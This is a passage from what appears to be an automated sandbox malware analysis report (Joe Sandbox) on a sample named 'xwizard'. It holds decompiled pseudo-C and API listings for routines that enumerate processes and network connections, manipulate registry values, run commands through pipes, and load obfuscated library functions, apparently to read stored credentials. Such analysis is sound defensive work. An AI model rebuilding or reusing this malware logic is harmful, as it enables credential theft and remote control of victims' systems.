							_t216 = _t235 * 0xc;
							_t170 = _t169 + _t216;
							_t171 =  *(_t170 + 8) & 0x0000ffff;
							_v1092 = _t171;
							L0041F914();
							_v1096 =  *((intOrPtr*)(_t170 + 4));
							_v1048 = _t171;
							L0041F924();
							_v1088 = _t171;
							_v1092 = 0x422c01;
							_v1096 = 0x40;
							_v1084 = _v1052 & 0x0000ffff;
							 *_t242 =  &_v1012;
							E004127A8();
							_v1092 = 0x104;
							_v1096 = _t237;
							 *_t242 =  *(_v1032 + _t216 + 0xc);
							E00402570(_t224, _t226, __eflags, _t224, _t226);
							_v1080 =  &_v1012;
							_t218 =  &_v624;
							_v1088 = _t237;
							_v1092 = 0x422c07;
							_v1096 = 0x204;
							 *_t242 = _t218;
							_v1084 =  *(_v1032 + _t216 + 0xc);
							_t180 = E004127A8();
							__eflags = _t180;
							if(_t180 > 0) {
								_v1092 = _t180;
								_v1096 = _t218;
								 *_t242 =  &_v1024;
								E00412458( &_v1024, _t226);
							}
							_t235 = _t235 + 1;
							__eflags = _t235;
						}
						goto L22;
					}
					 *_t240 = _v972;
					_t184 = malloc(??);
					_v980 = _t184;
					if(_t184 == 0) {
						goto L24;
					}
					_v1024 = 0;
					_v1028 = 5;
					_v1032 = 2;
					_v1036 = 1;
					_v1040 = _t234;
					 *_t240 = _t184;
					_t185 =  *_t213();
					_t240 = _t240 - 0x18;
					if(_t185 != 0) {
						L12:
						if(_v1004 != 0) {
							E00407F59( &_v1004);
						}
						goto L14;
					}
					_t236 = 0;
					_t238 =  &_v916;
					while(1) {
						_t188 = _v1004;
						if(_t236 >=  *_t188) {
							goto L12;
						}
						_t219 = _t236 * 0x18;
						_t189 = _t188 + _t219;
						_t190 =  *(_t189 + 0xc) & 0x0000ffff;
						_v1068 = _t190;
						L0041F914();
						_v1072 =  *((intOrPtr*)(_t189 + 8));
						_v1010 = _t190;
						L0041F924();
						_v1064 = _t190;
						_v1068 = "%s:%u";
						_v1072 = 0x40;
						_v1060 = _v1014 & 0x0000ffff;
						_v1076 =  &_v988;
						E004127A8();
						_t194 = _v1012 + _t219;
						_t195 =  *(_t194 + 0x14) & 0x0000ffff;
						_v1076 = _t195;
						L0041F914();
						_v1080 =  *((intOrPtr*)(_t194 + 0x10));
						_v1018 = _t195;
						L0041F924();
						_v1072 = _t195;
						_v1076 = "%s:%u";
						_v1080 = 0x40;
						_v1084 = _t238;
						_v1068 = _v1022 & 0x0000ffff;
						_t233 =  &_v868;
						E004127A8(_t224, _t226, _t224, _t226);
						_v1076 = 0x104;
						E00402570(_t224, _t226, __eflags, ( &(_v1020[_t219]))[0x18], _t233);
						_v1056 = E004081AA( *((intOrPtr*)(0x422ca0 + ( &(_v1020[_t219]))[4] * 4)));
						_v1060 = _t238;
						_v1064 =  &_v996;
						_t221 =  &_v608;
						_v1072 = _t233;
						_v1076 = 0x422bed;
						_v1080 = 0x204;
						_v1084 = _t221;
						_v1068 = ( &(_v1020[_t219]))[0x18];
						_t208 = E004127A8();
						__eflags = _t208;
						if(_t208 > 0) {
							E00412458( &_v1008, _t226,  &_v1008, _t221, _t208);
						}
						_t236 = _t236 + 1;
						__eflags = _t236;
					}
					goto L12;
				}
			}

0x0040262f
0x0040262f
0x00402633
0x00402648
0x00402654
0x00402659
0x00402660
0x00402664
0x00402669
0x00402670
0x00402674
0x00402679
0x00402680
0x00402694
0x00402699
0x004026a0
0x004026b2
0x004026b7
0x004026be
0x004026d2
0x004026d9
0x004026f2
0x004026f2
0x00402701
0x00402704
0x00402706
0x00402a74
0x00402a79
0x00402a7d
0x00402a9d
0x00402aa5
0x00402aad
0x00402a7f
0x00402a87
0x00402a8f
0x00402a97
0x00402a97
0x00402abf
0x00402ac7
0x00402ad3
0x00402adf
0x00402afa
0x00402714
0x00402714
0x00402718
0x00402720
0x00402728
0x00402730
0x00402738
0x00402740
0x00402744
0x0040274b
0x0040274d
0x00402753
0x004028fa
0x004028fa
0x004028fe
0x00402906
0x0040290e
0x00402916
0x0040291e
0x00402926
0x0040292a
0x00402931
0x00402935
0x0040293b
0x00000000
0x00000000
0x00402948
0x0040294f
0x00402953
0x00000000
0x00000000
0x00402959
0x00402961
0x00402969
0x00402971
0x00402979
0x0040297d
0x00402980
0x00402984
0x00402989
0x00402a61
0x00402a66
0x00402a6f
0x00402a6f
0x00000000
0x00402a66
0x0040298f
0x00402991
0x00402a55
0x00402a55
0x00402a5b
0x00000000
0x00000000
0x0040299d
0x004029a0
0x004029a5
0x004029a9
0x004029ac
0x004029b2
0x004029b5
0x004029ba
0x004029c5
0x004029cd
0x004029d5
0x004029dd
0x004029e1
0x004029e4
0x004029ed
0x004029f5
0x004029fe
0x00402a01
0x00402a0e
0x00402a15
0x00402a1c
0x00402a20
0x00402a28
0x00402a30
0x00402a33
0x00402a37
0x00402a3c
0x00402a3e
0x00402a40
0x00402a48
0x00402a4c
0x00402a4f
0x00402a4f
0x00402a54
0x00402a54
0x00402a54
0x00000000
0x00402a55
0x0040275d
0x00402760
0x00402767
0x0040276b
0x00000000
0x00000000
0x00402771
0x00402779
0x00402781
0x00402789
0x00402791
0x00402795
0x00402798
0x0040279a
0x0040279f
0x004028e7
0x004028ec
0x004028f5
0x004028f5
0x00000000
0x004028ec
0x004027a5
0x004027a7
0x004028db
0x004028db
0x004028e1
0x00000000
0x00000000
0x004027b3
0x004027b6
0x004027bb
0x004027bf
0x004027c2
0x004027c8
0x004027cb
0x004027d0
0x004027db
0x004027e3
0x004027eb
0x004027f3
0x004027f7
0x004027fa
0x00402803
0x00402808
0x0040280c
0x0040280f
0x00402815
0x00402818
0x0040281d
0x00402828
0x0040282c
0x00402834
0x0040283c
0x0040283f
0x00402843
0x0040284a
0x00402853
0x00402867
0x00402888
0x00402890
0x00402894
0x0040289b
0x004028a2
0x004028a6
0x004028ae
0x004028b6
0x004028b9
0x004028bd
0x004028c2
0x004028c4
0x004028d5
0x004028d5
0x004028da
0x004028da
0x004028da
0x00000000
0x004028db

APIs

Part of subcall function 0041236C: malloc.MSVCRT ref: 0041237C

Part of subcall function 00407F7A: LoadLibraryA.KERNEL32 ref: 00407F84

Part of subcall function 00407F8E: GetProcAddress.KERNEL32 ref: 00407FA0

malloc.MSVCRT ref: 00402760
htons.WS2_32 ref: 004027C2
htons.WS2_32 ref: 0040280F
htons.WS2_32 ref: 004029AC
inet_ntoa.WS2_32 ref: 004029BA
inet_ntoa.WS2_32 ref: 0040281D

Part of subcall function 00402570: CreateToolhelp32Snapshot.KERNEL32 ref: 004025BF
Part of subcall function 00402570: Process32First.KERNEL32 ref: 004025DF
Part of subcall function 00402570: CloseHandle.KERNEL32 ref: 0040261E

inet_ntoa.WS2_32 ref: 004027D0

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

malloc.MSVCRT ref: 00402948

Strings

Ed5jf5dRSdSuSsqCVid, xrefs: 00402699
@, xrefs: 004029D5
%s:%d, xrefs: 004029CD
kernel32.dll, xrefs: 00402669
%s:%u, xrefs: 0040282C
iphlpapi.dll, xrefs: 0040264D
Ed5jf5dRSdSqYsqCVid, xrefs: 00402679
+B, xrefs: 004028A6
psapi.dll, xrefs: 00402659
Ed590WYd66XlCnd_4idLCldD, xrefs: 004026B7, 004026DB

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: htonsinet_ntoamalloc$AddressCloseCreateFirstHandleLibraryLoadProcProcess32SnapshotToolhelp32_vsnprintf
String ID: %s:%d$%s:%u$@$Ed590WYd66XlCnd_4idLCldD$Ed5jf5dRSdSqYsqCVid$Ed5jf5dRSdSuSsqCVid$iphlpapi.dll$kernel32.dll$psapi.dll$+B
API String ID: 3806733647-2364278594
Opcode ID: 509372391fbaea05024ef59af88972020891577ff80d84ecfeba2467cf68ae9c
Instruction ID: 64c6eb304da1bd60933a222d55b1bae016526deff2b752f498ff56c04a6099ea
Opcode Fuzzy Hash: 509372391fbaea05024ef59af88972020891577ff80d84ecfeba2467cf68ae9c
Instruction Fuzzy Hash: 28D1A3B4908341ABC710AF65C58965EFBF0BF84748F418C2EF8C897291D7B9D988CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00410FC4, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 236
registryCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00410FC4(void* __ecx, long _a4, long _a8, int* _a12, void* _a16, long _a20, long _a24, long _a28, intOrPtr _a32) {
				long _v544;
				long _v548;
				int _v552;
				void* _v556;
				long* _v572;
				void** _v576;
				char* _v580;
				int* _v584;
				long _v588;
				long* _v592;
				int _v596;
				char* _v600;
				signed int _t122;
				signed int _t130;
				int* _t134;
				long _t135;
				void* _t137;
				intOrPtr* _t138;

				_t138 = _t137 - 0x24c;
				_t135 = _a8;
				_t134 = _a12;
				_t122 = _a32 - 1;
				if(_t122 > 5) {
					L28:
					_t130 = 0;
					L29:
					return _t130;
				}
				switch( *((intOrPtr*)(_t122 * 4 +  &M0042444C))) {
					case 0:
						_v580 = 0;
						_v584 = 0xf003f;
						_v588 = 0;
						_v592 = 0;
						_v572 =  &_v548;
						_v596 = 0;
						_v600 = _t134;
						 *_t138 = _t135;
						_v576 =  &_v556;
						_t126 = RegCreateKeyExA(??, ??, ??, ??, ??, ??, ??, ??, ??);
						_t138 = _t138 - 0x24;
						if(_t126 != 0) {
							goto L28;
						}
						_v584 = _t134;
						_v588 = _t135;
						_v592 = 1;
						goto L7;
					case 1:
						__eax =  &_v556;
						__eax = RegOpenKeyExA(__esi, __edi, 0, 0x2001f,  &_v556);
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax = _a28;
						_v596 = 0;
						_v600 = __ebp;
						_v584 = _a28;
						__eax = _a24;
						_v588 = _a24;
						__eax = _a20;
						_v592 = _a20;
						__eax = _v556;
						 *__esp = _v556;
						__eax = RegSetValueExA(??, ??, ??, ??, ??, ??);
						__esp = __esp - 0x18;
						__ebx = __eax;
						__eax = _v556;
						_push(RegCloseKey(_v556));
						if(__ebx != 0) {
							goto L28;
						}
						_v584 = __edi;
						_v588 = __esi;
						_v592 = 2;
						L7:
						_t131 =  &_v544;
						_v596 = "%c%.8x%s";
						_v600 = 0x204;
						 *_t138 = _t131;
						_t127 = E004127A8();
						goto L14;
					case 2:
						__eax = E0041086B(__ecx, __esi, __edi, __ebp);
						__bl = __al;
						if(__al == 0) {
							goto L28;
						}
						_v588 = __esi;
						__esi =  &_v544;
						_v580 = __ebp;
						_v584 = __edi;
						__eax = E004127A8(__esi, 0x204, "%c%.8x%s%s", 3);
						if(__eax == 0) {
							goto L16;
						}
						goto L27;
					case 3:
						__eax =  &_v556;
						__eax = RegOpenKeyExA(__esi, __edi, 0, 0x2001f,  &_v556);
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax = _v556;
						__ebx = RegDeleteValueA(_v556, __ebp);
						_push(__ecx);
						__eax = _v556;
						 *__esp = _v556;
						_push(RegCloseKey(__ecx));
						if(__ebx != 0) {
							goto L28;
						}
						__ebx =  &_v544;
						_v580 = __ebp;
						_v584 = __edi;
						_v588 = __esi;
						__eax = E004127A8( &_v544, 0x204, "%c%.8x%s\\%s", 4);
						L14:
						if(_t127 != 0) {
							_v592 = _t127;
							_v596 = _t131;
							_v600 = 0xe8;
							 *_t138 = _a4;
							E00405D7D(_t133);
						}
						L16:
						_t130 = 1;
						goto L29;
					case 4:
						goto L28;
					case 5:
						__eax =  &_v556;
						__eax = RegOpenKeyExA(__esi, __edi, 0, 0x2001f,  &_v556);
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax =  &_v552;
						_v588 = 0;
						_v596 = 0;
						_v600 = __ebp;
						__ebx = 0;
						_v584 =  &_v552;
						__eax =  &_v548;
						_v592 =  &_v548;
						__eax = _v556;
						 *__esp = _v556;
						__eax = RegQueryValueExA(??, ??, ??, ??, ??, ??);
						__esp = __esp - 0x18;
						if(__eax != 0) {
							L25:
							__eax = _v556;
							_push(RegCloseKey(_v556));
							if(__bl == 0) {
								goto L29;
							}
							__eax = _a24;
							_v588 = __esi;
							__esi =  &_v544;
							_v576 = __ebp;
							_v584 = __edi;
							_v592 = 6;
							_v596 = 0x42443c;
							_v580 = _a24;
							_v600 = 0x204;
							 *__esp = __esi;
							__eax = E004127A8();
							if(__eax == 0) {
								goto L29;
							}
							L27:
							_v592 = __eax;
							__eax = _a4;
							_v596 = __esi;
							_v600 = 0xe8;
							 *__esp = _a4;
							__eax = E00405D7D(__edx);
							goto L29;
						}
						__eax = _v552;
						__eax = malloc(_v552);
						_v544 = __eax;
						if(__eax == 0) {
							goto L25;
						}
						_v588 = __eax;
						__eax =  &_v548;
						__edx =  &_v552;
						_v596 = 0;
						_v600 = __ebp;
						_v592 =  &_v548;
						__eax = _v556;
						_v584 = __edx;
						 *__esp = _v556;
						__eax = RegQueryValueExA(??, ??, ??, ??, ??, ??);
						__esp = __esp - 0x18;
						if(__eax == 0) {
							__eax = _v552;
							_v596 = 0;
							_v584 = _v552;
							__eax = _v544;
							_v588 = _v544;
							__eax = _v548;
							_v592 = _v548;
							__eax = _a24;
							_v600 = _a24;
							__eax = _v556;
							 *__esp = _v556;
							__eax = RegSetValueExA(??, ??, ??, ??, ??, ??);
							__esp = __esp - 0x18;
							if(__eax != 0) {
								goto L21;
							}
							__eax = _v556;
							__eax = RegDeleteValueA(_v556, __ebp);
							_push(__edx);
							_push(__edx);
							__ebx = 0 | __eax == 0x00000000;
							L24:
							 &_v544 = E00407F59( &_v544);
							goto L25;
						}
						L21:
						__ebx = 0;
						goto L24;
				}
			}

0x00410fc8
0x00410fd5
0x00410fdc
0x00410fea
0x00410fee
0x004113a8
0x004113a8
0x004113aa
0x004113b6
0x004113b6
0x00410ff4
0x00000000
0x00410fff
0x00411007
0x0041100f
0x00411017
0x0041101f
0x00411027
0x0041102f
0x00411033
0x00411036
0x0041103a
0x0041103f
0x00411044
0x00000000
0x00000000
0x0041104a
0x0041104e
0x00411052
0x00000000
0x00000000
0x0041105f
0x0041107e
0x00411083
0x00411088
0x00000000
0x00000000
0x0041108e
0x00411095
0x0041109d
0x004110a1
0x004110a5
0x004110ac
0x004110b0
0x004110b7
0x004110bb
0x004110bf
0x004110c2
0x004110c7
0x004110ca
0x004110cc
0x004110da
0x004110db
0x00000000
0x00000000
0x004110e1
0x004110e5
0x004110e9
0x004110f1
0x004110f1
0x004110f5
0x004110fd
0x00411105
0x00411108
0x00000000
0x00000000
0x0041111d
0x00411124
0x00411126
0x00000000
0x00000000
0x0041112c
0x00411130
0x00411134
0x00411138
0x00411157
0x0041115e
0x00000000
0x00000000
0x00000000
0x00000000
0x00411169
0x00411188
0x0041118d
0x00411192
0x00000000
0x00000000
0x00411198
0x004111a8
0x004111aa
0x004111ac
0x004111b0
0x004111ba
0x004111bb
0x00000000
0x00000000
0x004111c1
0x004111c5
0x004111c9
0x004111cd
0x004111ec
0x004111f1
0x004111f3
0x004111f5
0x00411200
0x00411204
0x0041120c
0x0041120f
0x0041120f
0x00411214
0x00411214
0x00000000
0x00000000
0x00000000
0x00000000
0x0041121b
0x0041123a
0x0041123f
0x00411244
0x00000000
0x00000000
0x0041124a
0x0041124e
0x00411256
0x0041125e
0x00411262
0x00411264
0x00411268
0x0041126c
0x00411270
0x00411274
0x00411277
0x0041127c
0x00411281
0x00411337
0x00411337
0x00411345
0x00411346
0x00000000
0x00000000
0x00411348
0x0041134f
0x00411353
0x00411357
0x0041135b
0x0041135f
0x00411367
0x0041136f
0x00411373
0x0041137b
0x0041137e
0x00411385
0x00000000
0x00000000
0x00411387
0x00411387
0x0041138b
0x00411392
0x00411396
0x0041139e
0x004113a1
0x00000000
0x004113a1
0x00411287
0x0041128e
0x00411295
0x00411299
0x00000000
0x00000000
0x0041129f
0x004112a3
0x004112a7
0x004112ab
0x004112b3
0x004112b7
0x004112bb
0x004112bf
0x004112c3
0x004112c6
0x004112cb
0x004112d0
0x004112d6
0x004112da
0x004112e2
0x004112e6
0x004112ea
0x004112ee
0x004112f2
0x004112f6
0x004112fd
0x00411301
0x00411305
0x00411308
0x0041130d
0x00411312
0x00000000
0x00000000
0x00411314
0x0041131f
0x00411326
0x00411327
0x00411328
0x0041132b
0x00411332
0x00000000
0x00411332
0x004112d2
0x004112d2
0x00000000
0x00000000

APIs

RegCreateKeyExA.ADVAPI32 ref: 0041103A
RegOpenKeyExA.ADVAPI32 ref: 0041107E
RegSetValueExA.ADVAPI32 ref: 004110C2
RegCloseKey.ADVAPI32 ref: 004110D3
RegOpenKeyExA.ADVAPI32 ref: 00411188
RegDeleteValueA.ADVAPI32 ref: 004111A3
RegCloseKey.ADVAPI32 ref: 004111B3
RegOpenKeyExA.ADVAPI32 ref: 0041123A
RegQueryValueExA.ADVAPI32 ref: 00411277
malloc.MSVCRT ref: 0041128E
RegQueryValueExA.ADVAPI32 ref: 004112C6
RegSetValueExA.ADVAPI32 ref: 00411308
RegDeleteValueA.ADVAPI32 ref: 0041131F
RegCloseKey.ADVAPI32 ref: 0041133E

Strings

?, xrefs: 00411007
<DB, xrefs: 00411367

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Value$CloseOpen$DeleteQuery$Createmalloc
String ID: <DB$?
API String ID: 2456196832-2182478021
Opcode ID: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
Instruction ID: 5e49c9d9379b1dd87b15daa38270e0e0a3fc6f91244b4719e2a77dc22190009b
Opcode Fuzzy Hash: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
Instruction Fuzzy Hash: DAB1CFB0909345AFD700EF69D18469FFBE4BF84744F40892EF99887311D7B8D5898B46

Uniqueness

Uniqueness Score: -1.00%

Function 004113B8, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 198pipeprocessfileCOMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 004113D7

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

Part of subcall function 00406F1A: MultiByteToWideChar.KERNEL32 ref: 00406F53
Part of subcall function 00406F1A: GetFileAttributesW.KERNEL32 ref: 00406F5E

getenv.MSVCRT ref: 0041140B
CreatePipe.KERNEL32 ref: 004114B1
CreatePipe.KERNEL32 ref: 004114E0
GetStartupInfoA.KERNEL32 ref: 004114F3
CreateProcessA.KERNEL32 ref: 0041156E
CloseHandle.KERNEL32 ref: 004115A8
CloseHandle.KERNEL32(?), ref: 004115B7

Part of subcall function 00405D7D: EnterCriticalSection.KERNEL32 ref: 00405DAD
Part of subcall function 00405D7D: LeaveCriticalSection.KERNEL32 ref: 00405ECC

PeekNamedPipe.KERNEL32 ref: 0041161A
malloc.MSVCRT ref: 0041163E
ReadFile.KERNEL32 ref: 0041166C
CloseHandle.KERNEL32 ref: 004116BB
CloseHandle.KERNEL32(00000000), ref: 004116C9
TerminateProcess.KERNEL32(?,00000000), ref: 004116DE

Strings

lDB, xrefs: 004113DC
D, xrefs: 0041144E

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$CriticalFileProcessSectiongetenv$AttributesByteCharEnterInfoLeaveMultiNamedPeekReadStartupTerminateWide_vsnprintfmalloc
String ID: D$lDB
API String ID: 875277771-151759108
Opcode ID: 616a6ba28ebc10187a6d919c1e322df4324662c86dc99716dd64c8a11bba0f52
Instruction ID: c0a2dff8ecfd3ca449ec7184aa16f3f0f3f293b9e2d18e22baf8a99b3bb4e763
Opcode Fuzzy Hash: 616a6ba28ebc10187a6d919c1e322df4324662c86dc99716dd64c8a11bba0f52
Instruction Fuzzy Hash: F4919EB05087419FD710AF65C18875FBBE4AF84748F01892EE5D88B3A1D7B99489CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC15, Relevance: 27.2, APIs: 6, Strings: 12, Instructions: 218COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041AC2A
malloc.MSVCRT ref: 0041AC8B
free.MSVCRT ref: 0041AC9F

Part of subcall function 00414FEF: realloc.MSVCRT ref: 00415034

free.MSVCRT ref: 0041AF2C
free.MSVCRT ref: 0041AF38
free.MSVCRT ref: 0041AF8A

Strings

N, xrefs: 0041ADF4
A, xrefs: 0041AEC3
I, xrefs: 0041AE2D
I, xrefs: 0041AEAC
R, xrefs: 0041AE3C
P, xrefs: 0041ADD0
D, xrefs: 0041AE37
), xrefs: 0041ACB5
G, xrefs: 0041ADFD
H, xrefs: 0041AE32
D, xrefs: 0041AEBE
T, xrefs: 0041AED0

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: free$malloc$realloc
String ID: )$A$D$D$G$H$I$I$N$P$R$T
API String ID: 10190057-4026286603
Opcode ID: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
Instruction ID: 7b50295ee95f3483ab7dff93a2a89c17451d79e52031df4d4eaf42e24e8d509c
Opcode Fuzzy Hash: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
Instruction Fuzzy Hash: 14A1D27110D3809ED311DB69C48438FFFE1ABA6308F44895EE5C89B382D7B99989CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCE9, Relevance: 24.4, APIs: 16, Instructions: 395
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0040DCE9(struct HINSTANCE__* __edx, int* _a4) {
				char _v340;
				char _v344;
				char _v568;
				char _v824;
				char _v852;
				char _v856;
				void _v1068;
				char _v1080;
				void _v1084;
				int _v1092;
				int _v1096;
				int _v1100;
				int _v1104;
				int _v1108;
				char _v1112;
				int _v1116;
				int _v1120;
				_Unknown_base(*)()* _v1124;
				_Unknown_base(*)()* _v1128;
				int _v1132;
				signed int _v1136;
				int _v1144;
				int _v1148;
				char* _v1152;
				signed int _v1160;
				char _v1164;
				char _v1168;
				int* _v1172;
				int _v1176;
				int* _v1180;
				int* _v1184;
				int _v1188;
				int _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				signed char _v1204;
				int _v1208;
				int _v1212;
				int _v1216;
				int _v1220;
				char* _v1224;
				int _v1228;
				char* _v1232;
				int _v1236;
				int _t213;
				_Unknown_base(*)()* _t217;
				int _t218;
				_Unknown_base(*)()* _t221;
				int _t222;
				_Unknown_base(*)()* _t223;
				int _t224;
				signed int _t225;
				int _t231;
				void* _t239;
				void* _t243;
				void* _t263;
				char* _t264;
				int _t271;
				void* _t295;
				int _t296;
				signed char _t303;
				CHAR* _t306;
				intOrPtr* _t307;
				int _t308;
				struct HINSTANCE__* _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed char _t317;
				int* _t319;
				int _t321;
				intOrPtr* _t328;
				signed char _t329;
				int _t330;
				signed char _t331;
				struct HINSTANCE__* _t334;
				struct HINSTANCE__* _t335;
				char* _t336;
				char* _t337;
				int _t338;
				void* _t339;
				char** _t342;

				_t313 = __edx;
				_v1108 = 0;
				 *(memcpy( &_v1084, 0x4228a0, 4 << 2)) = 0;
				_v1104 = 0;
				_v1100 = 0;
				_v1096 = 0;
				_v1092 = 0;
				memcpy( &_v1068, 0x4228b0, 4 << 2);
				_t342 = _t339 - 0x48c + 0x18;
				_t334 = LoadLibraryA(E004081AA("2CQi5Yi4.Sii"));
				_t213 = 0;
				_push(_t306);
				if(_t334 == 0) {
					L38:
					return _t213;
				}
				_t328 = GetProcAddress(_t334, E004081AA("zCQi5TsdRzCQi5"));
				_v1180 = "zCQi5PiW6dzCQi5";
				_t217 = GetProcAddress(_t334, E004081AA(_t313));
				_v1180 = "zCQi5jRQld0C5dX5dl6";
				_v1128 = _t217;
				_t218 = E004081AA(0);
				_v1180 = _t334;
				_v1176 = _t218;
				_t307 = GetProcAddress(0, _t313);
				_v1180 = "zCQi5Ed5X5dl";
				_t221 = GetProcAddress(_t334, E004081AA(_t306));
				_v1180 = "zCQi5Ed5X5dl";
				_v1124 = _t221;
				_t222 = E004081AA(_t335);
				_v1180 = _t334;
				_v1176 = _t222;
				_t223 = GetProcAddress(_t335, _t306);
				_v1180 = "zCQi5_0dd";
				_v1120 = _t223;
				_t224 = E004081AA(_t313);
				_v1180 = _t334;
				_v1176 = _t224;
				_t225 = GetProcAddress(_t313, ??);
				_push(0);
				_push(0);
				_t314 = _t313 & 0xffffff00 | _t328 == 0x00000000;
				_v1136 = _t225;
				_t315 = _t314 & 0xffffff00 | _v1128 == 0x00000000;
				_t316 = _t315 & 0xffffff00 | _v1124 == 0x00000000;
				_t317 = _t316 & 0xffffff00 | _v1120 == 0x00000000;
				if((_t225 & 0xffffff00 | _t307 == 0x00000000 | _t314 | _t315 | _t316 | _t317) != 0 || _v1136 == 0) {
					L3:
					_t308 = 0;
					goto L33;
				} else {
					_v1176 = 0;
					_v1172 =  &_v1104;
					_v1180 =  &_v1084;
					_t239 =  *_t328();
					_t342 = _t342 - 0xc;
					if(_t239 != 0) {
						goto L3;
					}
					_v1188 = 0x200;
					_v1180 =  &_v1108;
					_v1184 =  &_v1112;
					_v1192 = _v1116;
					_t243 =  *_t307();
					_t342 = _t342 - 0x10;
					if(_t243 != 0 || _v1128 == 0) {
						goto L3;
					} else {
						if(E004132E6(0, _t317) != 0xa) {
							if(E004132E6(0, _t317) == 0xc || E004132E6(0, _t317) == 0xb || E004132E6(0, _t317) == 0xe || E004132E6(0, _t317) == 0xd || E004132E6(0, _t317) == 0xf) {
								goto L8;
							} else {
								_v1160 = 0;
								_t308 = 0;
								while(_v1160 < _v1128) {
									_v1200 = 0x10;
									_t317 = _v1124 + _v1160 * 0x34;
									_v1204 =  &_v1096;
									_v1208 = _t317;
									_t331 = _t317;
									if(E004129C0() == 0) {
										WideCharToMultiByte(0, 0,  *(_t331 + 0x10), 0xffffffff,  &_v1080, 0x100, 0, 0);
										WideCharToMultiByte(0, 0,  *((intOrPtr*)(_t331 + 0x14)) + 0x20, 0xffffffff,  &_v824, 0x100, 0, 0);
										_t337 =  &_v568;
										WideCharToMultiByte(0, 0,  *((intOrPtr*)(_t331 + 0x18)) + 0x20, 0xffffffff, _t337, 0x100, 0, 0);
										_v1188 = 0;
										_v1192 = 0;
										_v1120 = 0;
										_v1184 =  &_v1120;
										_v1196 =  *((intOrPtr*)(_t331 + 0x18));
										_v1204 = _t331;
										_v1200 =  *((intOrPtr*)(_t331 + 0x14));
										_v1208 = _v1132;
										_t295 = _v1152();
										_t342 = _t342 - 0xffffffffffffffc4;
										if(_t295 == 0) {
											_t321 =  &_v340;
											_v1208 = 0;
											_v1212 = 0;
											_v1216 = 0x100;
											_v1220 = _t321;
											_v1224 = 0xffffffff;
											_v1232 = 0;
											_v1236 = 0;
											_v1176 = _t321;
											_v1228 =  *((intOrPtr*)(_v1148 + 0x1c)) + 0x20;
											WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
											_t342 = _t342 - 0x20;
											_t317 = _v1176;
											_v1220 = _t337;
											_t338 =  &_v1144;
											_v1228 = 2;
											_v1232 = 0x4239a1;
											_v1224 =  &_v852;
											_v1144 = 0;
